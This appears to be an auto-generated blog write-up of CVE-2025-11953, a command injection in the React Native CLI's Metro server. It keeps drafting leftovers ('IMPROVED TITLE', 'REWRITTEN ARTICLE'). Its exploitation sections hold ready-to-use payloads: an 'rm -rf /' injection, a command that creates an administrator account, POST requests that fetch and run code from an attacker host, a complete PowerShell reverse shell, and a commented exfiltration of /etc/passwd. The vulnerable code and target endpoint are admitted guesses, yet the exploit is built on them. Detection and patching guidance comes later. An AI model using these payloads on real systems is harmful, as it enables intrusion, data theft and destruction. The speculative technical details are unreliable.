By zerosday cve bot•February 5, 2026•

cves

Reasoning:

1. IMPROVED TITLE

Title Variations:

CVE-2025-11953: React Native CLI RCE Exploit
React Native CLI Command Injection (CVE-2025-11953)
CVE-2025-11953: Critical React Native CLI RCE
React Native CLI Dev Server Exploit (CVE-2025-11953)
CVE-2025-11953: Critical React Native CLI RCE Exploit

BEST TITLE:

CVE-2025-11953: Critical React Native CLI RCE Exploit

2. REWRITTEN ARTICLE

CVE-2025-11953: Critical React Native CLI RCE Exploit

The React Native ecosystem, a cornerstone for cross-platform mobile development, has a critical vulnerability that could turn developer machines into attack vectors. CVE-2025-11953 exposes a severe OS command injection flaw within the Metro Development Server, a core component of the React Native Community CLI. This vulnerability allows unauthenticated network attackers to execute arbitrary code on a developer's workstation, bypassing security controls and potentially compromising sensitive project data.

This analysis dives deep into the mechanics of CVE-2025-11953, detailing its root cause, demonstrating realistic exploitation scenarios, and providing actionable insights for detection and robust mitigation.

Executive Technical Summary

The Metro Development Server, orchestrated by the React Native Community CLI, defaults to binding on external network interfaces. This default configuration exposes a critical endpoint that is susceptible to OS command injection. Unauthenticated attackers on the same network can exploit this by sending a crafted POST request to the server, enabling the execution of arbitrary executables. On Windows systems, the impact is particularly severe, allowing the execution of arbitrary shell commands with fully controlled arguments, posing a significant risk to developer workstations and the broader network infrastructure.

Technical Deep Dive: Root Cause Analysis (CWE-78)

CVE-2025-11953 is a textbook example of CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'). The vulnerability arises from how the Metro server processes certain incoming requests that interact with the underlying operating system. When the React Native CLI is initiated, the Metro server may expose an API endpoint that accepts user-supplied data – such as filenames, paths, or configuration parameters – and directly interpolates this input into shell commands executed by the server process.

The critical oversight is the absence of proper input sanitization and validation. Instead of treating user input as literal data, the server's internal logic permits special characters (e.g., ;, |, &, $(), `, etc.) to be interpreted as shell metacharacters. An attacker can leverage this by crafting input that includes these characters, effectively breaking out of the intended command context and injecting their own malicious commands.

Illustrative Vulnerable Code Snippet (Conceptual):

Consider a simplified scenario where Metro needs to process a file path for asset bundling. A hypothetical vulnerable function might look like this:

// Hypothetical vulnerable code snippet within Metro server
const { exec } = require('child_process');

function processAsset(filePath) {
  // Direct interpolation of user-controlled filePath into an OS command
  const command = `node scripts/asset-processor.js --input-path "${filePath}"`;
  exec(command, (error, stdout, stderr) => {
    if (error) {
      console.error(`Error executing command: ${error}`);
      return;
    }
    console.log(`Asset processed: ${stdout}`);
  });
}

An attacker could craft a filePath value such as: "; rm -rf /; #" (on Linux/macOS) or "; powershell -c "Invoke-Expression -Command 'net user attacker_user P@$$w0rd /ADD && net localgroup administrators attacker_user /ADD""; " (on Windows).

The exec function would then interpret these injected shell metacharacters, leading to the execution of the attacker's commands instead of just processing the intended file path.

Key Contributing Factors:

Default Network Binding: Metro binds to external network interfaces by default, making it accessible over the network.
Unauthenticated Access: The vulnerable endpoint lacks authentication, allowing any attacker on the same network (or exposed to the internet) to trigger it.
Direct OS Command Invocation: The server directly invokes OS commands with user-controlled input.

Vulnerability Details and Timeline

CVE ID: CVE-2025-11953
CVSS Base Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Attack Vector (AV): Network
- Attack Complexity (AC): Low
- Privileges Required (PR): None
- User Interaction (UI): None
- Scope (S): Unchanged
- Confidentiality Impact (C): High
- Integrity Impact (I): High
- Availability Impact (A): High

Affected Products and Versions

The vulnerability impacts specific versions of the React Native Community CLI:

react-native-community/react-native-community-cli:
- Versions: >= 19.0.0 and < 19.1.2
- Version: 18.0.0
- Version: 20.0.0
Affected Component Version: 4.8.0 (This likely refers to a specific internal dependency or module version within the CLI that houses the vulnerable code.)

Real-World Exploitation: From Network Scan to Full System Compromise

An attacker doesn't need direct physical access to a developer's machine. The default network binding of the Metro server is the primary entry point.

Realistic Attack Path:

Network Reconnaissance: An attacker scans the local network (e.g., a corporate Wi-Fi, public hotspot) or targets publicly exposed IP addresses for running Metro development servers. They look for open ports commonly used by the CLI (typically in the 8080-8089 range).
Vulnerability Identification: The attacker sends a simple probe request to a known vulnerable endpoint or attempts to trigger the command injection functionality. This might involve sending a POST request to an endpoint like /debugger-ui/debugger-ready or a similar API endpoint that processes user-provided parameters.

Payload Delivery & Execution: The attacker crafts a POST request containing shell metacharacters and their desired command.

Windows Example: Reverse Shell Establishment
The attacker aims to establish a reverse shell to gain interactive command execution.

POST /debugger-ui/debugger-ready HTTP/1.1
Host: <TARGET_IP>:8081 # Or other Metro port
Content-Type: application/json
User-Agent: Mozilla/5.0

{
  "name": "dummy",
  "port": 8081,
  "host": "127.0.0.1",
  "sourceMapPath": "dummy_path; powershell -nop -c \"iex ((new-object net.webclient).downloadstring('http://<ATTACKER_IP>:8000/shell.ps1'))\""
}

On the attacker's machine (<ATTACKER_IP>), a simple HTTP server hosts shell.ps1, containing PowerShell reverse shell code.

shell.ps1 (Attacker Server):

$client = New-Object System.Net.Sockets.TCPClient('<ATTACKER_IP>', 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
};
$client.Close();

The attacker listens on port 4444 for the incoming connection.

Linux/macOS Example: Malware Download and Execution
The attacker aims to download and execute arbitrary malware or a script.

POST /debugger-ui/debugger-ready HTTP/1.1
Host: <TARGET_IP>:8081 # Or other Metro port
Content-Type: application/json
User-Agent: Mozilla/5.0

{
  "name": "dummy",
  "port": 8081,
  "host": "127.0.0.1",
  "sourceMapPath": "dummy_path; curl http://<ATTACKER_IP>:8000/malware.sh | bash #"
}

On the attacker's machine, a simple HTTP server hosts malware.sh.

malware.sh (Attacker Server):

#!/bin/bash
echo "Malware executed!"
# Example: Download and execute a payload, exfiltrate data, etc.
# wget -qO- http://<ATTACKER_IP>:8000/payload.bin | sh
# curl -X POST -d "data=$(cat /etc/passwd)" http://<ATTACKER_IP>:8001/exfil

Post-Exploitation: Once code execution is achieved, the attacker has gained a foothold on the developer's machine. Depending on the privileges of the Metro server process (typically running as the logged-in user), this can lead to:
- Data Exfiltration: Stealing source code, API keys, credentials, sensitive project configurations, or intellectual property.
- Lateral Movement: Using the compromised developer workstation as a pivot point to attack other systems within the internal network, potentially reaching more sensitive servers.
- Malware Deployment: Installing ransomware, backdoors, cryptocurrency miners, or other malicious software.
- Persistence: Establishing persistent access to the compromised system, allowing repeated access even after reboots.

What Attackers Gain:

Arbitrary Code Execution: Complete control over the commands that can be run on the target system.
System Compromise: Depending on the user context, this can range from user-level access to administrator/root privileges.
Intellectual Property Theft: Direct access to proprietary source code, trade secrets, and sensitive project details.
Network Pivot: A launchpad for further attacks within the organization, bypassing perimeter defenses.

Exploitation Analysis (Advanced)

This vulnerability is particularly potent due to its low attack complexity and lack of user interaction. An attacker only needs to be on the same network as a vulnerable Metro development server. The exploit hinges on injecting malicious shell commands by manipulating parameters that the Metro server insecurely passes to operating system commands.

High-Level Exploit Flow:

Target Identification: Locate a developer machine running a vulnerable version of React Native CLI with the Metro development server exposed on the network. This can be achieved through network scanning tools like Nmap or by observing common development port usage.
Trigger Vulnerable Endpoint: Send a crafted POST request to a specific Metro server endpoint that is known to process input insecurely. The exact endpoint might vary, but it's typically related to asset handling, debugging, or proxying functionalities that interact with the file system or external processes. The /debugger-ui/debugger-ready endpoint is a common target.
Inject Shell Metacharacters: Craft the POST request's body or parameters to include shell metacharacters (;, |, &, $(), `, powershell, curl, wget, etc.) that allow command separation or command substitution.
Execute Arbitrary Command: The injected characters cause the OS command to terminate the legitimate operation and execute the attacker's supplied command. This command could be a simple whoami to confirm execution, or a more complex payload designed to establish a reverse shell, download further malware, or exfiltrate data.

Conceptual Exploit Payload Construction:

Let's assume the vulnerable endpoint expects a sourceMapPath parameter. The server might internally construct a command similar to:

# On Linux/macOS
node /path/to/metro-bundler/cli.js --sourcemap-path "<USER_SUPPLIED_SOURCE_MAP_PATH>"

An attacker would craft the sourceMapPath value to include command injection:

# Attacker-controlled sourceMapPath value:
'; curl http://<ATTACKER_IP>:8000/malware.sh | bash #'

This would transform the executed command on the victim machine into:

# The actual command executed on the victim machine:
node /path/to/metro-bundler/cli.js --sourcemap-path ''; curl http://<ATTACKER_IP>:8000/malware.sh | bash #

The '; terminates the legitimate --sourcemap-path argument and the previous command, initiating a new command. The curl ... | bash sequence downloads and executes a script from the attacker's server. The trailing # comments out any remaining part of the original command, preventing syntax errors.

What the Attacker Gains:

Remote Code Execution (RCE): The primary gain is the ability to run arbitrary code on the developer's machine.
Privilege Escalation: If the Metro server process runs with elevated privileges, the attacker inherits those privileges.
Data Compromise: Access to source code repositories, sensitive configuration files, API keys, and credentials stored on the development machine.
Network Pivoting: The compromised machine becomes a beachhead for further attacks into the internal corporate network, bypassing traditional perimeter defenses.

Detection and Mitigation Strategies

Proactive defense is paramount. Given the severity and network accessibility of CVE-2025-11953, immediate action is strongly recommended.

Detection: What to Monitor

Network Traffic Monitoring:
- Unusual POST Requests: Monitor for POST requests targeting Metro server ports (typically 8081, 8080) originating from unexpected internal or external IP addresses.
- Suspicious URL Paths & Payloads: Analyze HTTP POST payloads for known shell metacharacters (;, |, &, $(), `), command execution utilities (powershell, bash, sh, curl, wget), or suspicious string patterns indicative of command injection. Deep Packet Inspection (DPI) or Network Intrusion Detection Systems (NIDS) are crucial here.
- Anomalous Connections: Alert on outbound connections initiated by the Metro server process to unknown or suspicious external IP addresses/ports.
Endpoint Detection and Response (EDR) / Host-Based Intrusion Detection (HIDS):
- Process Execution Monitoring: Log and alert on unusual child processes spawned by the node process running the Metro server. Specifically, monitor for the execution of powershell.exe, bash, sh, or network utilities like curl and wget.
- File System Activity: Monitor for the creation or execution of new files in temporary directories or unexpected locations by the Metro server process.
- Registry Modifications (Windows): Track any suspicious registry changes that might indicate persistence mechanisms being established.
SIEM Correlation:
- Correlate network alerts (e.g., suspicious POST requests) with endpoint process execution logs to identify a complete attack chain, from initial network access to command execution.

Mitigation: Patching and Hardening

Immediate Patching/Upgrading:
- The most effective solution is to upgrade the react-native-community/react-native-community-cli to a patched version. The commit 15089907d1f1301b22c72d7f68846a2ef20df547 and pull request 2735 in the react-native-community/cli repository address this vulnerability by implementing robust input sanitization.
- Dependency Verification: Ensure all project dependencies that might indirectly utilize this CLI are also updated or scanned for vulnerabilities.
Network Segmentation and Firewalling:
- Restrict Access: Configure firewalls to strictly limit access to the Metro development server port (e.g., 8081) to only trusted IP addresses (e.g., the developer's own machine or specific internal subnets).
- Avoid Exposure: Never expose the Metro development server to the public internet. It is intended solely for local development use.
Configuration Hardening:
- Binding Address: Investigate and configure the Metro CLI to bind only to localhost (127.0.0.1) when network access is not explicitly required. While the default is external, understanding and utilizing configuration options can provide significant layers of defense.

Practical Defensive Validation (Authorized Personnel Only)

For organizations with a mature security testing program:

Isolated Lab Environment: Replicate the vulnerable environment in a dedicated, isolated lab. Utilize snapshotting for easy rollback and safe testing.
Synthetic Data Testing: Deploy the vulnerable CLI version with carefully crafted synthetic data that mimics potential attack vectors. Observe how the server handles these inputs.
Input Validation & Sanitization Testing: Focus on validating the server-side input sanitization and parameterization mechanisms implemented in patched versions. Attempt to bypass these controls with various encoding techniques and special characters.
IDS/WAF Tuning: Use safe, known malicious patterns (e.g., command injection payloads) to test and tune Intrusion Detection/Prevention Systems (IDS) and Web Application Firewalls (WAF) for optimal detection and to minimize false negatives.
Log Correlation Drills: Practice correlating network events with endpoint process execution logs to quickly identify the origin and impact of simulated attacks, refining incident response playbooks.

References

NVD Record: https://nvd.nist.gov/vuln/detail/CVE-2025-11953
MITRE CVE Record: https://www.cve.org/CVERecord?id=CVE-2025-11953
CISA KEV Catalog: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Commit Addressing Vulnerability: https://github.com/react-native-community/cli/commit/15089907d1f1301b22c72d7f68846a2ef20df547
Pull Request: https://github.com/react-native-community/cli/pull/2735
JFrog Blog Post: https://jfrog.com/blog/cve-2025-11953-critical-react-native-community-cli-vulnerability
VulnCheck Write-up: https://www.vulncheck.com/blog/metro4shell_eitw

This content is for defensive security training and authorized penetration testing only. Unauthorized use is strictly prohibited.